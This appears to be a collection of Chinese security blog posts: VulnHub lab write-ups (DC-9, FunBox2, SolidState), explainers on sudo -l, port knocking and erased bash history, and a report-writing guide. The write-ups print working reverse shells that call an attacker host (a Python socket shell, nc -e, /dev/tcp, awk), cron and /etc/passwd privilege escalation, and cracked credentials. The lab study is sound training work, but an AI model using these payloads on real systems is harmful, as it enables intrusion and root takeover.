1[DATA] attacking ssh://172.168.169.133:22/
2[22][ssh] host: 172.168.169.133 login: chandlerb password: UrAG0D!
3[22][ssh] host: 172.168.169.133 login: joeyt password: Passw0rd
4[22][ssh] host: 172.168.169.133 login: janitor password: Ilovepeepee

进账户搜账户下文件，发现history都被销毁了，只有janitor账户下有新东西。

1janitor@dc-9:~$ cat .secrets-for-putin/passwords-found-on-post-it-notes.txt 
2BamBam01
3Passw0rd
4smellycats
5P0Lic#10-4
6B4-Tru3-001
74uGU5T-NiGHts

再用这些密码继续爆破密码。

1[DATA] attacking ssh://172.168.169.133:22/
2[22][ssh] host: 172.168.169.133 login: fredf password: B4-Tru3-001
3[22][ssh] host: 172.168.169.133 login: joeyt password: Passw0rd

爆破出来新的fredf的账户，joeyt我们已经登陆过了。

fredf账户主页下面还是没有什么有价值的东西，但是fredf的权限组看起来应该是比之前的几个账户高的，之前的几个账户连运行sudo -l的权限都没有，而fredf有权限运行，且发现一个可以利用的脚本test。

/etc/passwd 提权

test在一个dist文件夹下，这个dist是典型的python编译为二进制文件，打包后的目录，所以查看该目录下能发现test的源码。

这个test的作用就是把2文件的内容加到1文件末尾，但是她是sudo权限，也就是说像/etc/passwd这样的文件它也可以加，我们可以加一个新账户，有root权限。注意这里的slat后面的单词：Salt 超过 8 字符导致截断，太长会导致验证时盐值不匹配。

openssl passwd -1 -salt MS02423 MS02423
cd /tmp # 不在tmp目录下echo输出的不对
echo 'MS02423:$1$MS02423$xCJ3D9eufDuODS1PBNjp51:0:0::/root:/bin/bash' > MS02423
sudo /opt/devstuff/dist/test/test MS02423 /etc/passwd

整点花活，都有川建国了不是，再加一个拜振华。

crontab反弹提权

test这个脚本的功能，除了可以写用户名，还可以写crontab，可以用来执行红队的一些高危命令，进而达到提权目的。

1*/5 * * * * /bin/nc 172.168.169.128 4444 -e /bin/sh

一开始想弹nc，但是发现nc命令用不了。但是他有些python的脚本那么python一定可以用。新建一个python脚本py3shell.py，写好攻击方法

 1import socket
 2import subprocess
 3import os
 4
 5# 设置目标主机和端口
 6HOST = '172.168.169.128' # 替换为攻击者的 IP 地址
 7PORT = 8888 # 替换为攻击者监听的端口
 8
 9# 创建 socket 对象并连接到攻击者
10s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
11s.connect((HOST, PORT))
12
13# 重定向标准输入、标准输出和标准错误
14os.dup2(s.fileno(), 0) # stdin
15os.dup2(s.fileno(), 1) # stdout
16os.dup2(s.fileno(), 2) # stderr
17
18# 执行 shell
19subprocess.call(['/bin/sh', '-i'])

再写一个用于test脚本写入crontab执行的文件111.txt，写入如下内容。

1* * * * * root /usr/bin/python3 /tmp/py3shell.py

然后再用test把命令加岛crontab中去。

1sudo /opt/devstuff/dist/test/test 11.txt /etc/crontab

一分钟后成功弹回。

AWK反弹和直接提权（失败）

查找当前账户下可用来反弹shell的命令

ls /bin | grep -E 'bash|sh|nc|netcat|socat|python|perl|php|ruby|telnet|openssl|awk|find'

发现有awk可以用，awk是可以直接提权的，不用写入crontab中。

/bin/awk 'BEGIN {s = "/inet/tcp/0/172.168.169.128/4444"; while(1) { do { printf "> " |& s; s |& getline c; if(c) { while ((c |& getline) > 0) print $0 |& s; close(c); } } while(c != "exit") } }'

尝试了这些命令都用不了，在root账户情况下，awk可以用，telnet也可以用，但是反弹没有回显

1*/5 * * * * /bin/bash -c '/bin/bash -i >& /dev/tcp/172.168.169.128/4444 0>&1' 
2 /bin/telnet 172.168.169.128 4444 | /bin/sh | /bin/telnet 172.168.169.128 4444

除了反弹shell，awk还可以直接提权https://gtfobins.github.io/，但是这个靶机用不了

关注 泷羽Sec和泷羽Sec-静安公众号，这里会定期更新与 OSCP、渗透测试等相关的最新文章，帮助你理解网络安全领域的最新动态。后台回复“OSCP配套工具”获取本文的工具

补充知识点：Sudo -l 的作用

sudo -l 是 Linux/Unix 系统中用于 查看当前用户的 sudo 权限 的命令，它能显示用户被允许执行的命令列表、目标用户身份（如 root）以及是否需要密码验证。

核心作用

权限审计
检查当前用户可以通过 sudo 执行哪些特权命令，避免权限滥用。
安全测试
渗透测试中快速识别可能的提权路径（如无密码执行危险命令）。

使用场景

系统管理：验证用户权限是否符合最小化原则。
安全渗透：寻找配置不当的 sudo 规则以提升权限。
故障排查：确认用户是否有权执行特定命令。

命令输出解析

运行命令：

1sudo -l

典型输出示例：

1Matching Defaults entries for user1 on host:
2 env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin
3
4User user1 may run the following commands on host:
5 (root) NOPASSWD: /usr/bin/apt
6 (admin) PASSWD: /usr/bin/systemctl restart nginx

(root): 允许以 root 身份运行命令。
NOPASSWD: 执行该命令 无需密码。
PASSWD: 执行该命令 需要密码。

安全风险示例

场景 1：无密码执行特权命令

1User alice may run the following commands:
2 (ALL) NOPASSWD: /usr/bin/vim /etc/sudoers

攻击方法：
通过 sudo vim /etc/sudoers 直接修改权限配置，添加提权规则。

场景 2：滥用可执行程序

1User bob may run the following commands:
2 (root) NOPASSWD: /usr/bin/python3 /scripts/*.py

攻击方法：
若可写入 /scripts/ 目录，替换恶意脚本并执行 sudo python3 /scripts/exploit.py。

防御建议

最小权限原则
- 仅授予必要的命令权限，避免使用 ALL 或通配符（*）。
- 示例：user1 ALL=(root) /usr/bin/apt update（仅允许更新软件包）。
密码验证
- 敏感操作强制密码验证：PASSWD: /usr/bin/systemctl *
审计配置
- 定期检查 /etc/sudoers 文件及 /etc/sudoers.d/ 目录：
```
1sudo visudo # 安全编辑配置文件
```

操作演示

查看当前用户权限：
```
1sudo -l
```
检查其他用户权限（需 root 权限）：
```
1sudo -l -U username
```

总结

sudo -l 是权限管理和渗透测试中的关键命令：

对管理员：确保权限配置安全，避免过度授权。
对攻击者：快速定位提权路径（如无密码执行 apt、find、vim 等）。

关注 泷羽Sec和泷羽Sec-静安公众号，这里会定期更新与 OSCP、渗透测试等相关的最新文章，帮助你理解网络安全领域的最新动态。后台回复“OSCP配套工具”获取本文的工具

补充知识点：敲门

一、端口敲门（Port Knocking）原理 通过按特定顺序访问一组预先定义的关闭的端口，触发服务器上的 knockd 服务动态修改防火墙规则（如 iptables），从而临时开放目标服务端口（如SSH的22端口）。

二、使用 nc 命令触发敲门 1. 基础命令 假设敲门顺序为 1000 -> 2000 -> 3000（TCP协议）：

1nc -v -w 1 target_ip 1000 # 敲门步骤1
2nc -v -w 1 target_ip 2000 # 敲门步骤2
3nc -v -w 1 target_ip 3000 # 敲门步骤3

2. 使用 UDP 协议敲门 如果敲门端口使用 UDP：

1nc -v -u -w 1 target_ip 1000 # UDP敲门

3. 一键触发多端口 通过 && 连接多个命令（按顺序执行）：

1nc -zv target_ip 1000 && nc -zv target_ip 2000 && nc -zv target_ip 3000

4. IPv6 环境

1nc -zv -6 target_ipv6 1000

参数说明

-v：显示详细输出（可选）
-z：只发送探测包，不传输数据
-w 1：超时1秒
-u：使用UDP协议

三、类似功能的替代命令 1. 使用 curl（HTTP模拟） 如果敲门服务监听HTTP端口（非标准用法）：

1curl http://target_ip:1000 # 模拟敲门步骤

2. 使用 nmap 发送探测包

1nmap -Pn --host-timeout 100 --max-retries 0 -p 1000,2000,3000 target_ip

3. 使用 telnet

1telnet target_ip 1000 # 敲门步骤（需手动关闭连接）

4. 使用 /dev/tcp（Bash内置）

1timeout 1 bash -c "echo > /dev/tcp/target_ip/1000" # 敲门步骤1

5. 专用工具 hping3 发送自定义TCP/UDP包：

1hping3 -S -p 1000 -c 1 target_ip # SYN包敲门

6. 使用 socat

1socat - TCP:target_ip:1000 # 敲门步骤

四、knockd 配置示例 1. /etc/knockd.conf 配置文件

 1[options]
 2 logfile = /var/log/knockd.log
 3
 4[openSSH]
 5 sequence = 1000:tcp,2000:udp,3000:tcp # 敲门顺序
 6 seq_timeout = 10 # 超时时间（秒）
 7 command = /sbin/iptables -A INPUT -s %IP% -p tcp --dport 22 -j ACCEPT # 开门规则
 8 tcpflags = syn # 仅响应SYN包
 9
10[closeSSH]
11 sequence = 4000,5000,6000 # 关闭SSH的敲门顺序
12 command = /sbin/iptables -D INPUT -s %IP% -p tcp --dport 22 -j ACCEPT

2. 启动 knockd

1systemctl start knockd # 使用systemd

五、替代工具推荐 1. fwknop (Single Packet Authorization)

更安全的替代方案，使用单包授权（加密+HMAC验证）
安装：apt install fwknop-server
客户端命令：

1fwknop -A tcp/22 -D target_ip --key-base64 "加密密钥"

2. 自定义脚本 使用 tcpdump 或 tshark 监听特定端口序列，触发防火墙规则变更。

六、注意事项

防火墙规则：确保服务器上的防火墙（如 iptables/nftables）默认阻止目标端口。
超时设置：knockd 的 seq_timeout 需合理配置，避免敲门失败。
加密建议：普通端口敲门（无加密）可能被嗅探，建议结合 fwknop 使用加密。
日志监控：检查 /var/log/knockd.log 调试敲门过程。
随机化端口顺序：避免使用固定顺序的端口，防止被暴力破解。

七、总结

基础方案：nc + knockd
安全增强：fwknop（推荐用于生产环境）
快速测试：nmap 或 /dev/tcp 模拟敲门

根据你的需求选择工具，优先考虑加密方案保护敏感服务！

关注 泷羽Sec和泷羽Sec-静安公众号，这里会定期更新与 OSCP、渗透测试等相关的最新文章，帮助你理解网络安全领域的最新动态。后台回复“OSCP配套工具”获取本文的工具

补充知识点：history怎么不见了

问题解析 你提到的 .bash_history -> /dev/null 是一个符号链接（Symbolic Link），它将用户的家目录下的 Bash 历史记录文件 .bash_history 指向了系统黑洞设备 /dev/null。这是导致你使用 history 命令查不到历史命令的直接原因。

详细解释

1. .bash_history 的作用

功能：Bash 终端会记录用户输入的命令，默认保存在 ~/.bash_history 文件中。
触发时机：
用户退出终端时，内存中的命令历史会写入 .bash_history。
用户登录时，Bash 会从 .bash_history 加载历史命令。

2. /dev/null 的作用

系统黑洞：任何写入 /dev/null 的数据会被直接丢弃，读取 /dev/null 会立即返回 EOF（空内容）。
效果：
当 .bash_history 被链接到 /dev/null 时：

◦ 退出终端时，历史命令会被写入 `/dev/null`（即永久丢失）。

◦ 登录终端时，Bash 尝试从 `/dev/null` 加载历史命令（得到空内容）。

3. 验证符号链接 执行以下命令检查 .bash_history 是否指向 /dev/null：

1ls -l ~/.bash_history

若输出类似：

1lrwxrwxrwx 1 user user 11 Jan 1 00:00 /home/user/.bash_history -> /dev/null

则确认符号链接存在。

为什么历史命令消失了？

原因 1：符号链接导致历史无法保存。
每次退出终端时，历史命令被写入 /dev/null 并被丢弃。
下次登录时，Bash 从 /dev/null 读取历史（得到空内容）。
原因 2：内存中的历史未被持久化。
即使当前终端会话中能看到 history 命令的输出（内存中的临时记录），退出后这些记录也不会保存。

恢复历史记录的步骤

1. 删除符号链接

1rm ~/.bash_history

2. 重建原始文件

1touch ~/.bash_history

3. 确保 Bash 配置正确 检查 ~/.bashrc 或 ~/.bash_profile 中是否包含以下配置（确保历史记录功能未被禁用）：

1# 确保以下变量未被设为 0 或空
2HISTSIZE=1000 # 内存中保存的历史命令数量
3HISTFILESIZE=2000 # 文件中保存的历史命令数量
4export HISTCONTROL=ignoredups # 可选：忽略重复命令

4. 重新加载配置

1source ~/.bashrc

防止历史记录丢失的配置 1. 锁定历史文件（只允许追加）

1chattr +a ~/.bash_history # 仅 root 可删除此文件（需 ext4 文件系统）

2. 实时写入历史（无需退出终端） 在 ~/.bashrc 中添加：

1# 实时追加命令到历史文件，而不是退出时保存
2PROMPT_COMMAND='history -a'

可能的安全隐患

操作背景：此类符号链接常见于攻击者掩盖入侵痕迹（如删除操作日志）。
建议检查：
检查系统是否被入侵：lastlog, who, /var/log/auth.log。
检查其他用户是否被篡改：ls -l /home/*/.bash_history。

总结

直接原因：.bash_history -> /dev/null 导致历史记录被丢弃。
解决方案：删除符号链接并重建文件，检查 Bash 配置。
安全建议：排查系统是否被恶意修改，加强权限控制。

🔔 想要获取更多网络安全与编程技术干货？

关注 泷羽Sec-静安 公众号，与你一起探索前沿技术，分享实用的学习资源与工具。我们专注于深入分析，拒绝浮躁，只做最实用的技术分享！💻

扫描下方二维码，马上加入我们，共同成长！🌟

👉 长按或扫描二维码关注公众号

或者直接回复文章中的关键词，获取更多技术资料与书单推荐！📚

Day9 FunBox2、SolidState靶场WP

Mon, 14 Apr 2025 00:01:12 +0000

泷羽Sec-静安，专注网络安全与编程技术的学习与分享，探索技术细节与实际应用。声明：本公众号所分享的工具与资源，仅供学习与研究使用，严禁用于任何非法活动。后台回复“配套工具”获取本文的工具

Funbox2 靶机Funbox: Rookie

靶机下载地址：https://download.vulnhub.com/funbox/Funbox2.ova

靶机导入错误的解决办法

如果导入靶机错误，或者找不到网址，可以按如下方式修改。重启虚机，并持续按 ‘Shift’ 键，然后按e进入如下界面，修改 ro 处，如果 ro 后面还有其他设置的话，一并删除就可以，把 ro 修改成 rw signie init=/bin/bash

修改 /etc/netplan/*.yaml 文件，改网卡名字。

需修改文件/etc/network/interfaces 修改网卡为ens33

https://www.vulnhub.cn/post/vulnhub-vm-ip/

信息收集

sudo arp-scan -l 扫描发现新网段

nmap -sV 172.168.169.130 扫描端口

nmap --script=vuln -p21,22,80 172.168.169.130扫描漏洞

80端口是一个初始网页，然后再看robots.txt下提示有个logs文件。

扫描目录也没有发现什么有用的信息。这里看了别的博客，发现有人尝试了FTP和SSH的相关漏洞用msf也打不进去，目前学习就不占用时间验证了，等着二刷再试试别的办法。

FTP匿名登陆

尝试用 ftp 172.168.169.130 登录，发现可以用 anonymous 匿名登录。

用 mget *命令下载所有文件。然后查看文件。

cat welcome.msg 
Welcome, archive user %U@%R !

The local time is: %T

This is an experimental FTP server. If you have any unusual problems,
please report them via e-mail to <root@%L>.

cat .@admins | base64 -d
Hi Admins,

be carefull with your keys. Find them in %yourname%.zip.
The passwords are the old ones.

Regards
root

密码爆破

提示密码在名字.zip文件里，但是这里又很多文件，解压其中一个发现要解压密码，先把压缩包转hash，然后用jonh爆hash。

zip2john anna.zip > anna.hash
john anna.hash --wordlist=../Downloads/dict/rockyou-top15000.txt

一个一个文件太麻烦了，让AI写了一个循环脚本。保存为zip2jhonhash.sh然后chmod +x zip2jhonhash.sh 最后执行，就能处理当前文件夹下的zip文件，爆破其密码。

 1#!/bin/bash
 2
 3# 定义字典路径（可根据需要修改）
 4WORDLIST="../Downloads/dict/rockyou-top15000.txt"
 5
 6# 检查必要命令是否存在
 7command -v zip2john >/dev/null 2>&1 || { echo >&2 "zip2john 未找到，请安装 John the Ripper"; exit 1; }
 8command -v john >/dev/null 2>&1 || { echo >&2 "john 未找到，请安装 John the Ripper"; exit 1; }
 9
10# 检查字典文件是否存在
11if [ ! -f "$WORDLIST" ]; then
12 echo "字典文件不存在: $WORDLIST"
13 exit 1
14fi
15
16# 计数器初始化
17total=0
18processed=0
19
20# 获取所有 ZIP 文件
21mapfile -t zip_files < <(find . -maxdepth 1 -type f -name "*.zip" -printf "%f\n")
22
23total=${#zip_files[@]}
24if [ "$total" -eq 0 ]; then
25 echo "当前目录未找到 ZIP 文件"
26 exit 0
27fi
28
29echo "发现 $total 个 ZIP 文件，开始处理..."
30
31# 主循环处理
32for zipfile in "${zip_files[@]}"; do
33 ((processed++))
34 
35 # 生成哈希文件名
36 hashfile="${zipfile%.zip}.hash"
37 
38 echo -e "\n[$processed/$total] 正在处理: $zipfile"
39 
40 # 生成哈希文件
41 if ! zip2john "$zipfile" > "$hashfile"; then
42 echo "错误：无法生成哈希文件 $hashfile"
43 continue
44 fi
45 
46 echo "生成哈希文件: $hashfile"
47 
48 # 执行破解
49 echo "启动 John 破解进程..."
50 if john --progress-every=30 --wordlist="$WORDLIST" "$hashfile"; then
51 echo -e "\n成功破解 $zipfile 的密码:"
52 john --show "$hashfile"
53 else
54 echo "未能破解 $zipfile 的密码"
55 fi
56 
57 # 清理临时文件（可选）
58 # rm -f "$hashfile"
59done
60
61echo -e "\n所有文件处理完成"

解压出来tom.zip 得到一个登录密钥。

SSH密钥登录

用ssh命令带密钥登录即可ssh tom@172.168.169.130 -i id_rsa

发现目录下有mysql历史记录，查看。

 1 cat .mysql_history
 2_HiStOrY_V2_
 3show\040databases;
 4quit
 5create\040database\040'support';
 6create\040database\040support;
 7use\040support
 8create\040table\040users;
 9show\040tables
10;
11select\040*\040from\040support
12;
13show\040tables;
14select\040*\040from\040support;
15insert\040into\040support\040(tom,\040xx11yy22!);
16quit

替换\40字符为空格，以为这里用的ascii码显示，然后发现tom的密码就是xx11yy22!。

方法一：su root提权

方法二：mysql提权

sudo mysql -u tom -p 
\! bash
echo $shell
id
cd /root
ls
cat flag.txt

SolidState靶场

靶机下载地址：https://download.vulnhub.com/solidstate/SolidState.zip

信息收集

80端口打开网页如下

扫描网站目录如下，没有什么特别的东西。

Readme.txt是作者介绍靶场的由来

回到之前的扫描结果中，除了80端口还开放了22端口，但是7.4的版本几乎没有poc能直接利用，还发现有25、110、 119端口开放似乎是搞了个JAMES的邮件系统。

 1└─$ nmap -sV 172.168.169.129 
 2Starting Nmap 7.95 ( https://nmap.org ) at 2025-04-13 05:03 EDT
 3Nmap scan report for 172.168.169.129
 4Host is up (0.0033s latency).
 5Not shown: 995 closed tcp ports (reset)
 6PORT STATE SERVICE VERSION
 722/tcp open ssh OpenSSH 7.4p1 Debian 10+deb9u1 (protocol 2.0)
 825/tcp open smtp JAMES smtpd 2.3.2
 980/tcp open http Apache httpd 2.4.25 ((Debian))
10110/tcp open pop3 JAMES pop3d 2.3.2
11119/tcp open nntp JAMES nntpd (posting ok)
12MAC Address: 00:0C:29:3F:7E:60 (VMware)
13Service Info: Host: solidstate; OS: Linux; CPE: cpe:/o:linux:linux_kernel
14
15Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
16Nmap done: 1 IP address (1 host up) scanned in 19.92 seconds

再做一次细致的扫描 nmap -sS -sV -A -T5 -p- 172.168.169.129发现有4555端口是远程端口。

 1└─$ nmap -sS -sV -A -T5 -p- 172.168.169.129
 2Starting Nmap 7.95 ( https://nmap.org ) at 2025-04-13 05:19 EDT
 3Nmap scan report for 172.168.169.129
 4Host is up (0.0017s latency).
 5Not shown: 65529 closed tcp ports (reset)
 6PORT STATE SERVICE VERSION
 722/tcp open ssh OpenSSH 7.4p1 Debian 10+deb9u1 (protocol 2.0)
 8| ssh-hostkey: 
 9| 2048 77:00:84:f5:78:b9:c7:d3:54:cf:71:2e:0d:52:6d:8b (RSA)
10| 256 78:b8:3a:f6:60:19:06:91:f5:53:92:1d:3f:48:ed:53 (ECDSA)
11|_ 256 e4:45:e9:ed:07:4d:73:69:43:5a:12:70:9d:c4:af:76 (ED25519)
1225/tcp open smtp JAMES smtpd 2.3.2
13|_smtp-commands: solidstate Hello nmap.scanme.org (172.168.169.128 [172.168.169.128])
1480/tcp open http Apache httpd 2.4.25 ((Debian))
15|_http-title: Home - Solid State Security
16|_http-server-header: Apache/2.4.25 (Debian)
17110/tcp open pop3 JAMES pop3d 2.3.2
18119/tcp open nntp JAMES nntpd (posting ok)
194555/tcp open james-admin JAMES Remote Admin 2.3.2
20MAC Address: 00:0C:29:3F:7E:60 (VMware)
21Device type: general purpose
22Running: Linux 3.X|4.X
23OS CPE: cpe:/o:linux:linux_kernel:3 cpe:/o:linux:linux_kernel:4
24OS details: Linux 3.2 - 4.14
25Network Distance: 1 hop
26Service Info: Host: solidstate; OS: Linux; CPE: cpe:/o:linux:linux_kernel
27
28TRACEROUTE
29HOP RTT ADDRESS
301 1.72 ms 172.168.169.129
31
32OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
33Nmap done: 1 IP address (1 host up) scanned in 83.89 seconds

输入命令nc 172.168.169.129 4555 发现可以直接root/root进，然后输入listusers发现有几个用户名。

还能setpassword重设密码，把所有用户的密码都设为123456。然后用telnet登录邮件服务器。

1telnet 172.168.169.129 110 # 登录邮件
2user john # 登录名
3pass 123456 # 登录密码
4list # 列出信件
5retr 1 # 读第一封信

可以看到James给John发了一封邮件让他限制Mindy的权限，然后给她一个临时密码。这里能收集到的信息有：

John和James可能都是管理员，且有一定运维基础，所以他们的密码应该难以爆破和登入。
Mindy大概率是个新人，但是系统给他分配的账号可能包含一些高级权限，而Mindy目前不能完全控制平台。
John可能按照James的指示给Mindy一个密码，极有可能在John写给Mindy的邮件里。

所以我们下一步应该看Mindy的邮件。

 1user mindy
 2+OK
 3pass 123456
 4+OK Welcome mindy
 5list
 6+OK 2 1945
 71 1109
 82 836
 9.
10retr 1
11+OK Message follows
12Return-Path: <mailadmin@localhost>
13Message-ID: <5420213.0.1503422039826.JavaMail.root@solidstate>
14MIME-Version: 1.0
15Content-Type: text/plain; charset=us-ascii
16Content-Transfer-Encoding: 7bit
17Delivered-To: mindy@localhost
18Received: from 192.168.11.142 ([192.168.11.142])
19 by solidstate (JAMES SMTP Server 2.3.2) with SMTP ID 798
20 for <mindy@localhost>;
21 Tue, 22 Aug 2017 13:13:42 -0400 (EDT)
22Date: Tue, 22 Aug 2017 13:13:42 -0400 (EDT)
23From: mailadmin@localhost
24Subject: Welcome
25
26Dear Mindy,
27Welcome to Solid State Security Cyber team! We are delighted you are joining us as a junior defense analyst. Your role is critical in fulfilling the mission of our orginzation. The enclosed information is designed to serve as an introduction to Cyber Security and provide resources that will help you make a smooth transition into your new role. The Cyber team is here to support your transition so, please know that you can call on any of us to assist you.
28
29We are looking forward to you joining our team and your success at Solid State Security. 
30
31Respectfully,
32James
33.
34
35retr 2
36+OK Message follows
37Return-Path: <mailadmin@localhost>
38Message-ID: <16744123.2.1503422270399.JavaMail.root@solidstate>
39MIME-Version: 1.0
40Content-Type: text/plain; charset=us-ascii
41Content-Transfer-Encoding: 7bit
42Delivered-To: mindy@localhost
43Received: from 192.168.11.142 ([192.168.11.142])
44 by solidstate (JAMES SMTP Server 2.3.2) with SMTP ID 581
45 for <mindy@localhost>;
46 Tue, 22 Aug 2017 13:17:28 -0400 (EDT)
47Date: Tue, 22 Aug 2017 13:17:28 -0400 (EDT)
48From: mailadmin@localhost
49Subject: Your Access
50
51Dear Mindy,
52
53
54Here are your ssh credentials to access the system. Remember to reset your password after your first login. 
55Your access is restricted at the moment, feel free to ask your supervisor to add any commands you need to your path. 
56
57username: mindy
58pass: P@55W0rd1!2@
59
60Respectfully,
61James

信息收集得到mindy的ssh登录密码是P@55W0rd1!2@

进入SSH

方法一：一句话直接进

1ssh mindy@172.168.169.131 "export TERM=xterm; python -c 'import pty; pty.spawn(\"/bin/sh\")'"
2ssh mindy@172.168.169.131 -t "bash --noprofile" # 建议用这个，能用vim

如果我们直接ssh不带参数的话，进去的是rbash，不是完整的，后期没法提权。

方法二：35513.py 直接进

搜索JAMES相关漏洞得到如下结果

1searchsploit JAMES

简单测试一下发现能连。

将payload改为如下内容，反弹shell。

nc 172.168.169.128(攻击机ip) 1234 -e /bin/bash

这里注意128是kali攻击机的ip，131是靶机的ip，中间网络断网重连过，所以网址变化过。kali攻击机本地开启监听

1nc -lvp 8000

然后打入poc后再用mindy的ssh密码链接即可。

1python2 35513.py 172.168.169.131 
2ssh mindy@172.168.169.131

得到第一段flag

1cat user.txt
2914d0a4ebc1777889b5b89a23f556fd75

提权

我们查看james相关的信息，他在opt目录下有相关信息。

1$ ps aux | grep james
2ps aux | grep james
3root 393 0.0 0.1 2332 584 ? Ss 07:56 0:00 /bin/sh /opt/james-2.3.2/bin/run.sh
4root 422 0.2 8.7 443624 44384 ? Sl 07:56 0:24 /usr/lib/jvm/java-8-openjdk-i386//bin/java -Djava.ext.dirs=/opt/james-2.3.2/lib:/opt/james-2.3.2/tools/lib -Djava.security.manager -Djava.security.policy=jar:file:/opt/james-2.3.2/bin/phoenix-loader.jar!/META-INF/java.policy -Dnetworkaddress.cache.ttl=300 -Dphoenix.home=/opt/james-2.3.2 -Djava.io.tmpdir=/opt/james-2.3.2/temp -jar /opt/james-2.3.2/bin/phoenix-loader.jar
5mindy 2520 0.0 0.1 4736 820 pts/1 S+ 10:43 0:00 grep james
6$

在/opt目录下发现一个可以利用的脚本，而且是以root的身份运行的。而使用命令find / -perm -0006 -type f ! -path "/proc/*" 2>/dev/null，查看是否存在other用户有read和write权限的脚本文件或可执行程序，并假设这些文件会被高权限用户的计划任务调用，从而通过在这些文件中写入提权代码来提权。也发现/opt/tmp.py脚本文件，这种脚本文件很大概率会被作为计划任务执行，而非手动执行。

尝试把反弹shell写到这个以root账户执行的脚本中，大概率就会弹回一个root权限的shell。要改这个py文件我们会发现vi和nano在这个丐版的sh上运行不佳，所以我们想个办法，要么把编辑好的文件传上去，要么用替换掉中间的字符或者插入命令。或者用之前可以用nano的命令进入即可修改

echo "os.system('/bin/nc -e /bin/bash 192.168.169.128 4444')" >> tmp.py

然后本机监听4444端口，等待几分钟等cortab运行这个文件。

1cat root.txt
2b4c9723a28899b1c45db281d99cc87c9

得到root的flag。

root权限下查看crontab也能看到在跑tmp.py这个文件。

🔔 想要获取更多网络安全与编程技术干货？

关注 泷羽Sec-静安 公众号，与你一起探索前沿技术，分享实用的学习资源与工具。我们专注于深入分析，拒绝浮躁，只做最实用的技术分享！💻

扫描下方二维码，马上加入我们，共同成长！🌟

👉 长按或扫描二维码关注公众号

或者直接回复文章中的关键词，获取更多技术资料与书单推荐！📚

快速上手渗透测试报告写作：从WP到甲方报告的一站式指南

Wed, 22 Jan 2025 16:13:45 +0000

关注公众号泷羽Sec-静安，回复关键词找工具+WP获取本文分享的WP模板和工具

师傅们在渗透测试过程中肯定要写WP和报告，这里分享我个人关于怎么快速写出格式整齐，内容完整详细，方便后期复现回溯的WP或者称“渗透测试报告”的经验。

软件和工具

首先，记笔记的首选语言当然是 Markdown，以下是两个常用的 Markdown 编辑软件推荐：

1. Vscode

Vscode 配合 markdownlint 插件和 Image preview 插件，能让你高效编辑 Markdown 文件。markdownlint 插件自带的功能可以在你复制图片时自动将图片转存到当前文件夹，并自动转换为 Markdown 格式的图片引用。Image preview插件则可以在行号栏的左侧显示图片的缩略图，悬停时还能看到大图预览，这样就无需切换到左右预览模式，编辑 Markdown 更加便捷。如果你是团队合作，TODO Tree 插件非常实用。它能够在文档中标记待办事项，对于长时间的渗透测试，帮助你标记哪些部分还需要复测或复现，远比传统的书签管理更为高效。使用 Vscode 的另一个优势是，它不仅适合Markdown 编辑，还支持代码调试，你可以在同一个平台上同时处理不同任务，减少频繁切换工具的麻烦。

2. Typora

Typora 的最大优点就是它的美观，简洁的界面和即时渲染的功能让编辑体验更加流畅。虽然 Typora 和 Vscode 都是通过 Pandoc 实现导出 Word 和 PDF 的功能，导出效果几乎一致，但 Typora 通过其优雅的界面和清爽的排版，能让你在长时间的安全研究中享受更多的视觉体验，缓解疲劳。毕竟，做网络安全工作已经够辛苦了，为什么不让编辑器也“好看”点呢？关于 Typora 的具体使用，我在之前的文章极客黑客的效率神器：Typora、Snipaste 与 Picgo 快速发布教程中已有详细分享。

关注泷羽Sec-静安公众号，后台回复找工具+20250115 获取相关软件

渗透测试报告的写作方法

其次，最重要的一点是，请务必开启 Snipaste 软件的 自动保存功能。这个功能可以有效帮助你保存那些可能忘记保存的图片，尤其是在撰写报告时，涉及到带有 flag、路径等证据性截图的部分。在渗透测试过程中，随时按下 F1 键并回车，软件会自动保存截图，而不会影响你的进攻节奏或思路。完成攻击并收集到必要的资产后，你可以慢慢整理并编写报告，从之前保存的截图中挑选合适的证据，而无需在渗透时同时进行报告撰写。这不仅会拖慢进攻节奏，也可能被一些格式美观问题打断思路。

在实际渗透过程中，我通常会在 VScode 中打开一个新的页面，简单写下报告的标题，接着加上一条分割线 ---，然后将相关的信息随时记录在分割线以下，不需要考虑格式是否美观。这些信息可以包括路径、网址、获取的密码、使用的进攻方式等，甚至可以放上几张有用的图片和截图，但不用刻意调整对齐和格式。简单来说，就像流水账一样，将所有信息往文档里丢就行。

当进攻目标暂时完成或可以复测时，可以适当停下来，整理之前的草稿，将分割线下的信息总结到分割线之上。整理的时候记得从自动保存的文件夹里找合适的截图，证明你的攻击成果。我推荐按照如下格式进行整理：

活动描述：描述漏洞或攻击场景。
系统名称：例如 XXX 系统（最好标明上下游系统关系，我个人通常使用 A > B 表示从 A 系统进入 B 系统，这样后续画攻击路径图时会更直观）。
目标单位：填入被攻击的单位名称，不是自己的单位。
网址：http://www.example.com/login.php
漏洞名称：例如 Windows 远程执行漏洞 或 CVE-2024-38077（如果有 CVE 编号，优先填写编号；如果没有 CVE 编号，使用最广泛的漏洞名称）。
**泄露资产：**公民个人信息XXX条，内网服务器用户名和密码XX条，域控主机XX台（得分点的关键，最直观的指标就是看你拿了多少条信息）。
待清理文件/路径：列出可能需要清理的文件或路径，便于后续复测。（就是说你木马放哪里了）
执行 PoC：（可选，如果使用了某个工具，需填写工具名称并附上截图；如果是自编 PoC，无论是 HTTP 请求头还是其他攻击载荷，都应完整写出 PoC，不能仅写关键路径，要将整个 PoC 内容写全）。
建议意见：关于漏洞修复的建议策略，选填，可以在最后编写。

在授权测试的场景中，除了自己撰写的 Markdown 文件，通常甲方或你的队长会提供一个 Word 模板作为参考。这个模板通常包含表格、标题、目录等格式。然而，我不建议在测试过程中直接在 Word 模板上修改或编写报告，因为 Word 的排版问题往往会成为干扰因素。例如，网址粘贴后可能会转行，导致格式错误；或者在复制粘贴图片时，会提示图片过大需要压缩，造成不必要的麻烦。

更好的做法是，先使用上述的 Markdown 模板来写报告，完成后使用 Pandoc 将 Markdown 文件导出为 Word 格式。你可以使用以下命令将 Markdown 文件导出为 .docx 文件：

1pandoc input.md -o output.docx

导出的 Word 文件可以上传到 WPS，利用其 AI 排版功能（请注意，高级别保密测试时不建议使用此功能）来调整格式。上传 Word 模板后，WPS 会自动根据模板的排版规则对导出的文件进行排版，生成符合模板要求的报告。

